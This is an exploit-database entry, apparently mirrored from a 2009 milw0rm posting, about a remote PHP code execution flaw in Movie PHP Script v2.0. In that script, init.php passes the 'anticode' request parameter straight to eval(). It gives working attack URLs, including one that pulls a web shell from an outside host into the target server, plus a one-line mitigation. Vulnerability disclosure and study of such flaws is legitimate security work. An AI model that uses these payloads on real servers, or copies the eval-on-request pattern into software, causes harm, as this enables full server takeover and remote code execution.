Movie PHP Script v2.0 Remote PHP Code Execution

vendor:

Movie PHP Script

by:

SirGod

7,5

CVSS

HIGH

Remote PHP Code Execution

CWE

Product Name: Movie PHP Script

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: NO

Related CWE: N/A

CPE: a:mortal-team:movie_php_script

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Movie PHP Script v2.0 Remote PHP Code Execution

The vulnerable code is located in system/services/init.php, line 84. An attacker can execute arbitrary PHP code by sending a crafted request to the vulnerable script. An example of a malicious request is http://127.0.0.1/path/system/services/init.php?anticode=include 'http://www.darkmindz.com/shell/x2300_mod.txt';

Mitigation:

Input validation should be used to prevent the execution of arbitrary code.

Source

Exploit-DB raw data:

#################################################################################################################
[+] Movie PHP Script v2.0 Remote PHP Code Execution
[+] Discovered By SirGod 
[+] www.mortal-team.org
#################################################################################################################

[+] Remote PHP Code Execution

  - Vulnerable code in  system/services/init.php :

---------------------------------------------------------------------------------
Line 84 : @eval(stripslashes($_REQUEST['anticode']));
---------------------------------------------------------------------------------

- PoC : 

    http://127.0.0.1/[path/]system/services/init.php?anticode=[YOUR PHP CODE]

- Example : 

   http://127.0.0.1/path/system/services/init.php?anticode=include "http://www.darkmindz.com/shell/x2300_mod.txt";

- Example 2 :

  http://127.0.0.1/path/system/services/init.php?anticode=phpinfo();

#################################################################################################################

# milw0rm.com [2009-06-03]